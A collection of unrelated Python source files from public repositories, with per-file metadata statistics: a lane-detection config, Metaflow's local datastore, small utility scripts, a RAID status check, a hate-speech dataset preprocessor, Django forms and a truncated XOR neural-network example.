| 25.847458 | 79 | 0.591475 | 203 | 1,525 | 4.384236 | 0.438424 | 0.040449 | 0.044944 | 0.062921 | 0.174157 | 0.160674 | 0.160674 | 0.130337 | 0.130337 | 0.130337 | 0 | 0.000923 | 0.28918 | 1,525 | 58 | 80 | 26.293103 | 0.820111 | 0.547541 | 0 | 0 | 0 | 0 | 0.028862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cdf95764c7d48293946ebbedd290b920fcacdcb | 2,768 | py | Python | configs/PINet/baseline_tusimple.py | masszhou/lane_detector | e28fe4adbd4c804e45c9bd86743739196bc30105 | [
"MIT"
] | 4 | 2020-10-07T03:31:42.000Z | 2022-03-23T04:10:56.000Z | configs/PINet/baseline_tusimple.py | masszhou/lane_detector | e28fe4adbd4c804e45c9bd86743739196bc30105 | [
"MIT"
] | null | null | null | configs/PINet/baseline_tusimple.py | masszhou/lane_detector | e28fe4adbd4c804e45c9bd86743739196bc30105 | [
"MIT"
] | 1 | 2020-11-16T07:13:53.000Z | 2020-11-16T07:13:53.000Z | # use with vars(Parameters()) if need dict
class Parameters:
def __init__(self):
# train setup
self.batch_size = 8
self.num_epochs = 700
        self.learning_rate = 0.0001
        self.l_rate = 0.0001
        self.weight_decay = 0
self.save_path = "tmp/"
self.model_path = "tmp/"
self.validate_epochs = 10
# data loader setup
self.dataset_name = "tusimple"
self.flip_ratio = 0.4
self.translation_ratio = 0.6
self.rotate_ratio = 0.6
self.noise_ratio = 0.4
self.intensity_ratio = 0.4
self.shadow_ratio = 0.6
self.scaling_ratio = 0.2
self.train_root_url = "/media/zzhou/data-tusimple/lane_detection/train_set/"
self.train_json_file = ['label_data_0313.json', 'label_data_0531.json', 'label_data_0601.json']
self.val_root_url = "/media/zzhou/data-tusimple/lane_detection/test_set/"
self.val_json_file = ["test_tasks_0627.json"]
self.test_root_url = "/media/zzhou/data-tusimple/lane_detection/test_set/"
self.test_json_file = ["test_tasks_0627.json"]
# anchor setup
self.x_size = 512
self.y_size = 256
self.resize_ratio = 8
self.grid_x = self.x_size // self.resize_ratio # 64
self.grid_y = self.y_size // self.resize_ratio # 32
self.feature_size = 4 # feature size in similarity matrix in instance layer
# loss function
self.K1 = 1.0
self.K2 = 2.0
self.constant_offset = 1.0
self.constant_exist = 1.0 # 2
self.constant_nonexist = 1.0 # 1.5 last 200epoch
self.constant_angle = 1.0
self.constant_similarity = 1.0
self.constant_alpha = 1.0 # in SGPN paper, they increase this factor by 2 every 5 epochs
self.constant_beta = 1.0
self.constant_gamma = 1.0
self.constant_back = 1.0
self.constant_l = 1.0
self.constant_lane_loss = 1.0 # 1.5 last 200epoch
self.constant_instance_loss = 1.0
        # post processing
self.threshold_confidence = 0.81
self.threshold_instance = 0.22
# self.grid_location = np.zeros((self.grid_y, self.grid_x, 2)) # anchor template
# for y in range(self.grid_y):
# for x in range(self.grid_x):
# self.grid_location[y][x][0] = x
# self.grid_location[y][x][1] = y
# misc
self.last_model_path = "tmp/"
self.color = [(0, 0, 0), (255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), (255, 0, 255), (0, 255, 255),
(255, 255, 255), (100, 255, 0), (100, 0, 255), (255, 100, 0), (0, 100, 255), (255, 0, 100),
(0, 255, 100)]
| 40.115942 | 116 | 0.584538 | 405 | 2,768 | 3.787654 | 0.298765 | 0.016949 | 0.031291 | 0.063885 | 0.264016 | 0.239896 | 0.182529 | 0.182529 | 0.0691 | 0.0691 | 0 | 0.106022 | 0.298049 | 2,768 | 68 | 117 | 40.705882 | 0.683479 | 0.179552 | 0 | 0.039216 | 0 | 0 | 0.121778 | 0.068444 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0 | 0 | 0.039216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce2120db3a3e4b8a38a101f55fe4d120b1ad93e | 10,175 | py | Python | metaflow/datastore/local.py | vamagithub/metaflow | 8126e80004b0042a0eb148332bfac11c850ea02b | [
"Apache-2.0"
] | null | null | null | metaflow/datastore/local.py | vamagithub/metaflow | 8126e80004b0042a0eb148332bfac11c850ea02b | [
"Apache-2.0"
] | null | null | null | metaflow/datastore/local.py | vamagithub/metaflow | 8126e80004b0042a0eb148332bfac11c850ea02b | [
"Apache-2.0"
] | null | null | null | """
Local storage
Store data under .metaflow/ in the cwd
"""
import os
import json
import gzip
from tempfile import NamedTemporaryFile
from metaflow.util import Path
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_LOCAL
from .datastore import MetaflowDataStore, DataException, only_if_not_done
from ..metadata import MetaDatum
class LocalDataStore(MetaflowDataStore):
TYPE = 'local'
METADATA_DIR = '_meta'
def _makedirs(self, path):
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def object_path(self, sha):
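        # git-style fan-out: shard blobs into subdirectories named after the
        # first two characters of the sha to keep directory listings small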
root = os.path.join(self.data_root, sha[:2])
return os.path.join(root, sha)
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
# Compute path for DATASTORE_SYSROOT_LOCAL
result = DATASTORE_SYSROOT_LOCAL
if result is None:
try:
# Python2
current_path = os.getcwdu()
except: # noqa E722
current_path = os.getcwd()
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
check_dir = os.path.realpath(check_dir)
orig_path = check_dir
top_level_reached = False
while not os.path.isdir(check_dir):
new_path = os.path.dirname(current_path)
if new_path == current_path:
top_level_reached = True
break # We are no longer making upward progress
current_path = new_path
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
if top_level_reached:
if create_on_absent:
# Could not find any directory to use so create a new one
echo('Creating local datastore in current directory (%s)' % orig_path,
fg='magenta', bold=True)
os.mkdir(orig_path)
result = orig_path
else:
return None
else:
result = check_dir
else:
result = os.path.join(result, DATASTORE_LOCAL_DIR)
return result
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
run_prefix = cls.make_path(flow_name, run_id)
data_blobs = []
if os.path.exists(run_prefix):
if steps is None:
steps = [s for s in os.listdir(run_prefix) if s != cls.METADATA_DIR]
if pathspecs is None:
task_prefixes = []
for step in steps:
step_prefix = cls.make_path(flow_name, run_id, step)
for task in os.listdir(step_prefix):
if task == cls.METADATA_DIR:
continue
task_prefixes.append(
cls.make_path(flow_name, run_id, step, task))
else:
task_prefixes = [cls.make_path(flow_name, pathspec)
for pathspec in pathspecs]
for task_prefix in task_prefixes:
step, task = task_prefix.split('/')[-2:]
# Sort the file listing to iterate in increasing order of
# attempts.
latest_data_path = None
latest_attempt = None
latest_done_attempt = None
for fname in sorted(os.listdir(task_prefix)):
if cls.is_done_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_done_attempt = attempt
# Read the corresponding metadata file.
meta_fname = \
cls.get_metadata_filename_for_attempt(attempt)
latest_data_path = os.path.join(task_prefix, meta_fname)
elif cls.is_attempt_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_attempt = attempt
# Only read the metadata if the latest attempt is also done.
if latest_done_attempt is not None and\
latest_done_attempt == latest_attempt:
with open(latest_data_path) as f:
data_blobs.append((step, task, attempt, f.read()))
return data_blobs
else:
raise DataException("Couldn't find data at %s" % run_prefix)
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
artifact_list = []
for path in artifacts_to_prefetch:
sha = path.split('/')[-1]
artifact_list.append((sha,
cls.decode_gzip_data(path)))
return artifact_list
@only_if_not_done
def save_logs(self, logsource, stream_data):
"""
Save log files for multiple streams, represented as
as a list of (stream, bytes) or (stream, Path) tuples.
"""
for stream, data in stream_data:
if isinstance(data, Path):
with open(str(data), 'rb') as f:
data = f.read()
path = self.get_log_location(logsource, stream)
with open(path + '.tmp', 'wb') as f:
f.write(data)
os.rename(path + '.tmp', path)
def _read_file_or_empty(self, path):
if os.path.exists(path):
with open(path, 'rb') as f:
return f.read()
else:
return b''
def load_log_legacy(self, stream, attempt_override=None):
"""
Load old-style, pre-mflog, log file represented as a bytes object.
"""
f = self.filename_with_attempt_prefix('%s.log' % stream,
attempt_override if attempt_override is not None
else self.attempt)
return self._read_file_or_empty(os.path.join(self.root, f))
def load_logs(self, logsources, stream, attempt_override=None):
paths = [self.get_log_location(source, stream, attempt_override)
for source in logsources]
return list(zip(logsources, map(self._read_file_or_empty, paths)))
@only_if_not_done
def save_metadata(self, name, metadata):
"""
Save a task-specific metadata dictionary as JSON.
"""
self._makedirs(self.root)
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path + '.tmp', 'w') as f:
json.dump(metadata, f)
os.rename(path + '.tmp', path)
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path) as f:
return json.load(f)
def has_metadata(self, name, with_attempt=True):
attempt = self.attempt if with_attempt else None
filename = self.filename_with_attempt_prefix('%s.json' % name, attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path)
@only_if_not_done
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
path = self.object_path(sha)
if not os.path.exists(path):
self._makedirs(os.path.dirname(path))
# NOTE multiple tasks may try to save an object with the
# same sha concurrently, hence we need to use a proper tmp
# file
with NamedTemporaryFile(dir=os.path.dirname(path),
prefix='blobtmp.',
delete=False) as tmp:
# NOTE compresslevel makes a huge difference. The default
# level of 9 can be impossibly slow.
with gzip.GzipFile(fileobj=tmp,
mode='wb',
compresslevel=3) as f:
f.write(transformable_object.current())
os.rename(tmp.name, path)
return path
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
with gzip.open(self.object_path(sha), 'rb') as f:
return f.read()
@only_if_not_done
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
self._makedirs(self.root)
try:
# this is for python2 compatibility.
# Python3 has open(mode='x').
fd = os.fdopen(os.open(path,
os.O_EXCL | os.O_WRONLY | os.O_CREAT),
'wb')
fd.close()
except OSError as x:
if x.errno == 17:
raise DataException('Path %s already exists. Try with a '
'different --run-id.' % path)
else:
raise
self.metadata.register_metadata(
self.run_id, self.step_name, self.task_id,
[MetaDatum(field='attempt-done', value=str(self.attempt), type='attempt-done', tags=[])])
self._is_done_set = True
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
successfully with done().
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path)
| 38.835878 | 101 | 0.542408 | 1,163 | 10,175 | 4.558899 | 0.216681 | 0.024896 | 0.022633 | 0.018484 | 0.224821 | 0.198227 | 0.166918 | 0.152961 | 0.108072 | 0.099396 | 0 | 0.00236 | 0.375332 | 10,175 | 261 | 102 | 38.984674 | 0.831812 | 0.116069 | 0 | 0.243523 | 0 | 0 | 0.026817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082902 | false | 0 | 0.041451 | 0 | 0.217617 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce2bb6332214e5787c31f91afe5d0568271109b | 505 | py | Python | scripts/json2yaml.py | hivdb/hiv-aapcnt | 4d4b1d268cfe48c5539abc48311c53a412b6e063 | [
"Unlicense"
] | null | null | null | scripts/json2yaml.py | hivdb/hiv-aapcnt | 4d4b1d268cfe48c5539abc48311c53a412b6e063 | [
"Unlicense"
] | 2 | 2020-02-20T19:24:36.000Z | 2020-08-28T18:48:52.000Z | scripts/json2yaml.py | hivdb/hiv-aapcnt | 4d4b1d268cfe48c5539abc48311c53a412b6e063 | [
"Unlicense"
] | 1 | 2020-01-27T22:08:18.000Z | 2020-01-27T22:08:18.000Z | #! /usr/bin/env python3
import os
import sys
import json
import yaml
BASEDIR = os.path.dirname(
os.path.dirname(os.path.abspath(__file__))
)
DATADIR = os.path.join(BASEDIR, 'data')
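# Usage: json2yaml.py path/to/file.json  -> writes path/to/file.yml next to it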
def json2yaml(jsonfile):
yamlfile = os.path.splitext(jsonfile)[0] + '.yml'
with open(jsonfile) as infile, open(yamlfile, 'w') as outfile:
data = json.load(infile)
yaml.dump(data, outfile)
def main():
    if len(sys.argv) < 2:
        sys.exit('usage: json2yaml.py <file.json>')
    filename = sys.argv[1]
    json2yaml(filename)
if __name__ == '__main__':
main()
| 18.703704 | 66 | 0.661386 | 69 | 505 | 4.666667 | 0.550725 | 0.093168 | 0.080745 | 0.093168 | 0.099379 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012285 | 0.194059 | 505 | 26 | 67 | 19.423077 | 0.77887 | 0.043564 | 0 | 0 | 0 | 0 | 0.03527 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce2bfabe9312aa121a1f7bd46b001dd3646a79a | 632 | py | Python | app/main.py | DrSnowbird/python-nonroot-docker | 761f6ab0dfed483b2a807e7d4b449f79e4dc83a9 | [
"Apache-2.0"
] | null | null | null | app/main.py | DrSnowbird/python-nonroot-docker | 761f6ab0dfed483b2a807e7d4b449f79e4dc83a9 | [
"Apache-2.0"
] | null | null | null | app/main.py | DrSnowbird/python-nonroot-docker | 761f6ab0dfed483b2a807e7d4b449f79e4dc83a9 | [
"Apache-2.0"
] | null | null | null |
import re
def myfunc(n):
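    # closure factory: returns a function that multiplies its argument by n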
return lambda a : a * n
def check(text, re_pattern):
    pattern = re.compile(re_pattern)
    # match the string against the compiled pattern
    if pattern.search(text):
        print(f"str={text}, regex_pattern={re_pattern}: => Valid String")
    else:
        print(f"str={text}, regex_pattern={re_pattern}: => Invalid String")
if __name__ == '__main__':
    # driver code
    re_pattern = '^[1234]+$'
check('2134', re_pattern)
check('349', re_pattern)
mydoubler = myfunc(2)
mytripler = myfunc(3)
print(f"mydoubler(11)=> {mydoubler(11)}")
print(f"mydoubler(11)=> {mytripler(11)}")
| 22.571429 | 68 | 0.650316 | 88 | 632 | 4.443182 | 0.409091 | 0.184143 | 0.081841 | 0.092072 | 0.296675 | 0.168798 | 0.168798 | 0.168798 | 0 | 0 | 0 | 0.040619 | 0.181962 | 632 | 27 | 69 | 23.407407 | 0.715667 | 0.053797 | 0 | 0.111111 | 0 | 0 | 0.330523 | 0.091062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.055556 | 0.055556 | 0.222222 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce3881801186fd9d17c3809c4d389aeb65945e8 | 903 | py | Python | fossor/checks/raid_status.py | NeolithEra/fossor | d8dbdc40f2f16da601c317dfa74b83e3932c9bb3 | [
"BSD-2-Clause"
] | 165 | 2017-12-14T18:44:25.000Z | 2020-12-09T01:48:57.000Z | fossor/checks/raid_status.py | NeolithEra/fossor | d8dbdc40f2f16da601c317dfa74b83e3932c9bb3 | [
"BSD-2-Clause"
] | 12 | 2017-12-14T23:42:45.000Z | 2020-05-29T15:11:02.000Z | fossor/checks/raid_status.py | NeolithEra/fossor | d8dbdc40f2f16da601c317dfa74b83e3932c9bb3 | [
"BSD-2-Clause"
] | 32 | 2017-12-14T17:51:57.000Z | 2020-06-12T13:11:47.000Z | # Copyright 2017 LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import os
import re
from fossor.checks.check import Check
class RaidStatus(Check):
def run(self, variables: dict):
'''Check if there are any drives down in a Raid Array.'''
mdstat_location = '/proc/mdstat'
if not os.path.exists(mdstat_location):
self.log.debug(f"{mdstat_location} does not exist.")
return
with open(mdstat_location, 'rt') as f:
mdstat = f.read()
        arrays = re.findall(r'\[[U_]+\]', mdstat)
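        # in /proc/mdstat each array member shows as 'U' (up) or '_' (down/failed)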
for array in arrays:
if '_' in array:
message = f"Drives down in Raid Array ({array})\n"
message += f"{mdstat_location} output:\n"
message += f"{mdstat}"
return message
| 32.25 | 100 | 0.601329 | 115 | 903 | 4.66087 | 0.573913 | 0.130597 | 0.044776 | 0.05597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007862 | 0.295681 | 903 | 27 | 101 | 33.444444 | 0.834906 | 0.230343 | 0 | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce4daa3cfa61c28a43cef1df7228c7cd3574d0f | 3,211 | py | Python | src/data_preprocess.py | Superar/hate-speech | acc02755fe5d2f60eeda040239059c57bce52265 | [
"MIT"
] | null | null | null | src/data_preprocess.py | Superar/hate-speech | acc02755fe5d2f60eeda040239059c57bce52265 | [
"MIT"
] | null | null | null | src/data_preprocess.py | Superar/hate-speech | acc02755fe5d2f60eeda040239059c57bce52265 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import os
import gensim
import pickle
import string
import numpy as np
import pandas as pd
from scipy.stats import pearsonr
from nltk.corpus import stopwords
from gensim.models import Word2Vec
from nltk import word_tokenize
from nltk.stem import SnowballStemmer
from sklearn.feature_extraction.text import CountVectorizer
data_header = '../data/'
def read_data(metadata,path):
filenames = os.listdir(path)
file_ids = [os.path.splitext(f)[0] for f in filenames]
labels = metadata[metadata['file_id'].isin(file_ids)].label
labels = pd.get_dummies(labels)['hate']
stop_words = set(stopwords.words('portuguese'))
pt_stemmer = SnowballStemmer('portuguese')
# translator = str.maketrans('','', string.punctuation)
corpus = []
    for f in filenames:
        with open(os.path.join(path, f)) as fp:
            text = fp.read().lower()
# text = text.translate(translator)
tokens = word_tokenize(text,language='portuguese')
sentence = ''
for token in tokens:
if not token in stop_words:
sentence += pt_stemmer.stem(token) + ' '
corpus.append(sentence)
return corpus,labels
def word2vec(data,k=300,path='../data/model.bin'):
corpus = [word_tokenize(sentence) for sentence in data]
    try:
        model = Word2Vec.load(path)
    except (FileNotFoundError, OSError):
        # no cached model yet -- train one and cache it
        model = Word2Vec(corpus, size=k, window=5, min_count=1, workers=4)
        model.save(path)
transformed_corpus = []
for example in corpus:
vec = np.zeros(k)
for word in example:
            try:
                vec += model[word]
            except KeyError:
                print(word, 'is not part of vocab')
vec /= k
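        # note: this divides by the embedding dimension k, not the number of
        # words, so it is a fixed rescaling rather than a true per-document mean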
transformed_corpus.append(vec)
return transformed_corpus
def select_by_corr(corpus,labels,top_n=1000):
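    # Rank every bag-of-words column by |Pearson r| against the labels and
    # keep only the top_n most label-correlated words in each document.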
vectorizer = CountVectorizer()
bow = vectorizer.fit_transform(corpus)
corrs = []
for col in bow.toarray().T:
corr, _ = pearsonr(col, labels)
corrs.append(corr)
vocab = np.asarray(vectorizer.get_feature_names())
sorted_idxs = np.argsort(np.abs(corrs))[-top_n:]
top_sorted = vocab[sorted_idxs]
selected_corpus = []
for sentence in corpus:
s = ''
sentence = word_tokenize(sentence)
for word in sentence:
if word in top_sorted:
s += word + ' '
selected_corpus.append(s)
return selected_corpus
def save_features(path='../hate-speech-dataset/sampled_train/',suffix='train'):
metadata = pd.read_csv('../hate-speech-dataset/annotations_metadata.csv')
corpus,labels = read_data(metadata,path)
corpus1 = word2vec(corpus)
with open(data_header + 'word2vec_'+suffix+'.pickle', 'wb') as f:
pickle.dump(corpus1, f, pickle.HIGHEST_PROTOCOL)
for i in [500,1000]:
print(i)
corpus2 = select_by_corr(corpus,labels,i)
with open(data_header + 'selected'+str(i)+'_'+suffix+'.pickle', 'wb') as f:
pickle.dump(corpus2, f, pickle.HIGHEST_PROTOCOL)
def main():
save_features('../hate-speech-dataset/sampled_train/','train')
save_features('../hate-speech-dataset/sampled_test/','test')
if __name__ == '__main__':
main() | 29.731481 | 83 | 0.642479 | 403 | 3,211 | 4.972705 | 0.349876 | 0.023952 | 0.033932 | 0.035928 | 0.103792 | 0.062874 | 0.026946 | 0 | 0 | 0 | 0 | 0.011827 | 0.236375 | 3,211 | 108 | 84 | 29.731481 | 0.805465 | 0.034257 | 0 | 0.048193 | 0 | 0 | 0.097773 | 0.050662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060241 | false | 0 | 0.144578 | 0 | 0.240964 | 0.024096 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce5b0e14e8819235945155dd2844577ff1df613 | 980 | py | Python | insta/forms.py | Nkurumwa/instaclone | b28d65a351abe350def66c88ee0d701cfe3784fb | [
"MIT"
] | 1 | 2021-07-24T15:29:35.000Z | 2021-07-24T15:29:35.000Z | instagram/forms.py | sharon002/insta-gram | dcce96464a4e51485f7a077299dcd3adf34da078 | [
"MIT"
] | 2 | 2021-06-08T20:37:10.000Z | 2021-09-08T01:26:46.000Z | insta/forms.py | Nkurumwa/instaclone | b28d65a351abe350def66c88ee0d701cfe3784fb | [
"MIT"
] | 1 | 2021-07-24T15:29:36.000Z | 2021-07-24T15:29:36.000Z | from django import forms
from django.contrib.auth.forms import UserCreationForm
from .models import Comment, Image, Profile
from django.contrib.auth.models import User
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
exclude = ['image', 'user']
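        # image and user are excluded here and presumably attached in the view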
class ImageForm(forms.ModelForm):
class Meta:
model = Image
exclude = ['likes', 'post_date', 'profile']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['profile_photo', 'bio']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class PostIMageForm(forms.ModelForm):
class Meta:
model = Image
fields = ['image', 'image_caption'] | 24.5 | 64 | 0.652041 | 101 | 980 | 6.29703 | 0.346535 | 0.084906 | 0.132075 | 0.144654 | 0.371069 | 0.283019 | 0.179245 | 0.179245 | 0.179245 | 0.179245 | 0 | 0.002674 | 0.236735 | 980 | 40 | 65 | 24.5 | 0.847594 | 0 | 0 | 0.4 | 0 | 0 | 0.110092 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.033333 | 0.133333 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cee8dcc6601bc078015e3b03c773e86c36ea5da | 10,863 | py | Python | NeuralNetworks/XOR_2LayerNN/xor_bck_prop.py | Sumit1673/Projects | 82e3d352617655bb27be460acfc443fe9c741e24 | [
"MIT"
] | null | null | null | NeuralNetworks/XOR_2LayerNN/xor_bck_prop.py | Sumit1673/Projects | 82e3d352617655bb27be460acfc443fe9c741e24 | [
"MIT"
] | null | null | null | NeuralNetworks/XOR_2LayerNN/xor_bck_prop.py | Sumit1673/Projects | 82e3d352617655bb27be460acfc443fe9c741e24 | [
"MIT"
] | null | null | null | from matplotlib.colors import ListedColormap
import numpy as np
from random import seed
from math import exp
from random import random
import matplotlib.pyplot as plt
# Activation functions
sigmoid_functn = lambda x: 1/(1+ np.exp(-x))
sigmoid_derivative = lambda x: x * (1-x)
# Question(a): Analyzing the input to hidden weights by applying different types of distribution
# to generate the weights randomly: random weights, binomially distributed, uniformally distributed
# non-bounded normal distribution of the weights
def truncated_normal(mean=0, sd=1, low=0, upp=10):
from scipy.stats import truncnorm
return truncnorm(
(low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)
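# e.g. truncated_normal(mean=0, sd=1, low=-1, upp=1).rvs((rows, cols)) draws a
# weight matrix from a normal clipped to [-1, 1] (cf. the commented-out
# initialisation inside XORNeuralNetwork.__init__).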
class XORNeuralNetwork:
"""
Network Arch : 2 ,2, 1
Network with 2 inputs, 2 neurons in a hidden layer, and one output
"""
def __init__(self, arch):
"""CREATING LAYERS AND ITS CORRESPONDING WEIGHTS
No. of weights depends upon the number of neurons in the previous layer and bias depends upon
no. of neurons in the present layer.
        The weights created here are the parameters which affect the output of that layer when multiplied
        with the output from the previous layer. Consider the previous layer to be the input layer: its
        output is simply the input. This output is then multiplied by the weights of the hidden layer. The
        job of a neuron in a layer is to take the weighted sum of its inputs and apply a non-linear
        function to that sum to determine how strongly the neuron fires."""
np.random.seed(0)
# Initialized the weights, activation function and epochs
self.activation_func = sigmoid_functn
        self.activation_func_deriv = sigmoid_derivative
self.layers = len(arch)
self.steps_per_epoch = 100
self.arch = arch
self.weights = []
# Intializing weights with random values b/w -1 ,1
for each_layer in range(self.layers - 1): # for inp to hidden and hidden to out
#-------------------- inp/hidden ----------hidden/out
w = 2*np.random.rand(arch[each_layer] + 1, arch[each_layer+1]) - 1
# w = 2*np.random.binomial(1, 0.1, size=(arch[each_layer] + 1, arch[each_layer+1])) -1
# un-bounded Normally distributed weights, results change if standard deviation or mean values are changed
# X = truncated_normal(mean=0, sd=1, low=-1, upp=1)
# w = X.rvs([arch[each_layer] + 1, arch[each_layer+1]])
self.weights.append(w)
# plt.hist(self.weights[0])
# plt.show()
def fit_model(self, training_set, expected_outputs, learning_rate=0.1, epochs=100):
self.error_vs_epoch = np.zeros(shape=(epochs,1))
# concatenating one for the bias with the existing weights of the neurons
ones = np.ones((1, training_set.shape[0]))
X = np.concatenate((ones.T, training_set), axis=1)
self.plot_hidden_layer_output(training_set, expected_outputs, title="Before training")
for each_epoch in range(epochs):
# training randomly not in sequence
random_train_sample = np.random.randint(training_set.shape[0])
# Feeding values to the network with a forward pass
_set = [X[random_train_sample]]
y_hat = self.forward_pass(_set)
# plot_inp_out_weigthts(self.weights[0])
            # Compute the weight updates via back-propagation
            y = expected_outputs[random_train_sample]
            error = self.back_propagation(y_hat, y, learning_rate)
self.error_vs_epoch[each_epoch] = error[-1]
if (each_epoch+1) % 10000 == 0:
print('epochs: {}'.format(each_epoch + 1))
print('Error: {}'.format(error[-1]))
self.plot_decision_line(training_set, expected_outputs)
self.plot_error()
# Plot data and results ############################
def plot_error(self):
fig, ax = plt.subplots()
plt.plot(self.error_vs_epoch)
ax.set(xlabel='Epochs', ylabel=' Error',
title='Error Vs Epochs')
ax.grid()
plt.show()
def forward_pass(self, train_set):
"""
Take each input and forward it to each neuron. At each neuron weighted sum of all the inputs that comes from
the nodes of the previous layer. Then the weighted sum is passed to the activation function to find the
reaction of a neuron for a given set of inputs.
:param train_set:
:return: will be a np. array with the output of all the neurons
"""
for i in range(len(self.weights)-1):
activation = np.dot(train_set[i], self.weights[i])
activity = sigmoid_functn(activation)
# add the bias for the next layer
activity = np.concatenate((np.ones(1), np.array(activity)))
train_set.append(activity)
# last layer
activation = np.dot(train_set[-1], self.weights[-1])
activity = sigmoid_functn(activation)
train_set.append(activity)
return train_set
    def back_propagation(self, Y_hat, Y, lr):
error = (Y - Y_hat[-1])
        # delta = dL/dz, where z is the output of the output neuron. This delta
        # is propagated backwards, combined at each layer with the local
        # gradient, i.e. the derivative of each neuron's activation w.r.t. its output.
delta_vec = [error * sigmoid_derivative(Y_hat[-1])]
# Traversing backwards
for i in range(self.layers-2, 0, -1):
error = delta_vec[-1].dot(self.weights[i][1:].T)
error = error * sigmoid_derivative(Y_hat[i][1:])
delta_vec.append(error)
delta_vec.reverse()
# Stochastic gradient descent for weights optimization
for i in range(len(self.weights)):
layer = Y_hat[i].reshape(1, self.arch[i]+1) # from (3,1) --> (1,3)
delta = delta_vec[i].reshape(1, self.arch[i+1])
# self.weights[i] += lr*layer.T.dot(delta)
